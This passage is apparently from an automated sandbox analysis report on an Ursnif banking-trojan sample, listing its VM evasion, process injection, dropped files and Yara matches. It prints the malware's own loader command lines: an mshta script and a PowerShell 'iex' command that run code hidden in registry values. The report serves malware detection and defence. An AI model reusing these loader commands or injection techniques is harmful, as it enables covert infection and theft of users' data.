Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Contains capabilities to detect virtual machines
Source: C:\Windows\System32\control.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5290
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3761
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 240 Thread sleep count: 53 > 30 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3096 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001F7DD8 memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_001F7DD8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B1E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_00B1E0BA
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B2888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_00B2888D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B34FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_00B34FE1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B205EF wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_00B205EF
Source: explorer.exe, 00000017.00000000.855300373.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000017.00000000.850175253.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000019.00000000.864043995.0000027D4F440000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: RuntimeBroker.exe, 00000019.00000000.861049272.0000027D4C640000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000017.00000000.855300373.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: control.exe, 00000018.00000002.864575917.000002A3D6BC5000.00000004.00000020.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\a-
Source: explorer.exe, 00000017.00000000.860537146.000000000FCE0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000017.00000000.847166251.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000017.00000000.856000294.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000017.00000000.850175253.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000019.00000000.864043995.0000027D4F440000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: RuntimeBroker.exe, 00000019.00000000.862963971.0000027D4E762000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: explorer.exe, 00000017.00000000.850175253.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000019.00000000.864043995.0000027D4F440000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000017.00000000.856000294.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000017.00000000.850175253.00000000058C0000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000019.00000000.864043995.0000027D4F440000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B15BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_00B15BD5
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B316A5 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 1_2_00B316A5

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: C:\Windows\System32\control.exe base: A20000 protect: page execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Memory allocated: C:\Windows\System32\rundll32.exe base: 16D9CD20000 protect: page execute and read and write
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\System32\control.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.0.cs Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\control.exe Thread created: unknown EIP: BD4F1580
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\regsvr32.exe Thread register set: target process: 5152 Jump to behavior
Source: C:\Windows\System32\control.exe Thread register set: target process: 3424
Source: C:\Windows\System32\control.exe Thread register set: target process: 2848
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7EEE712E0 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: A20000 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7EEE712E0 Jump to behavior
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF770335FD0
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 16D9CD20000
Source: C:\Windows\System32\control.exe Memory written: C:\Windows\System32\rundll32.exe base: 7FF770335FD0
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ljarxop3\ljarxop3.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\huo1uow1\huo1uow1.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESA74F.tmp' 'c:\Users\user\AppData\Local\Temp\ljarxop3\CSC1A4E6FF24B5843DD91B4B2D685136E16.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESB5E5.tmp' 'c:\Users\user\AppData\Local\Temp\huo1uow1\CSCD4A633EEA14B4698A251A533E137966.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: explorer.exe, 00000017.00000000.841154073.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000017.00000000.841414143.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000019.00000000.861521420.0000027D4CC60000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000017.00000000.850569436.0000000005E50000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000019.00000000.861521420.0000027D4CC60000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000017.00000000.841414143.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000019.00000000.861521420.0000027D4CC60000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000017.00000000.841414143.0000000001080000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000019.00000000.861521420.0000027D4CC60000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000017.00000000.856000294.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001F8B98 cpuid 1_2_001F8B98
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00B2B585 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 1_2_00B2B585
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001F24C2 HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,Sleep,IsWow64Process, 1_2_001F24C2
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001F8B98 GetUserNameW,GetUserNameW,HeapFree,HeapFree, 1_2_001F8B98
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001F7890 GetVersionExA,wsprintfA, 1_2_001F7890
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.778286799.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.843211689.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778174223.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778148472.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778122341.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778237278.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778275510.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.785789013.0000000004D6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.850197611.000002A3D6AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.863933904.0000016D9D01E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778197663.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778255655.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5032, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3848, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5152, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2848, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.778286799.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.843211689.0000000000B50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778174223.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778148472.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778122341.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778237278.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.862721568.0000016D9CE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.837542203.000001895DE90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000003.859361649.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.863378164.000000000099E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778275510.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.785789013.0000000004D6B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000003.850197611.000002A3D6AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.861261874.0000000000B10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.863933904.0000016D9D01E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778197663.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.778255655.0000000004EE8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 5032, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3848, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 5152, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2848, type: MEMORY
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
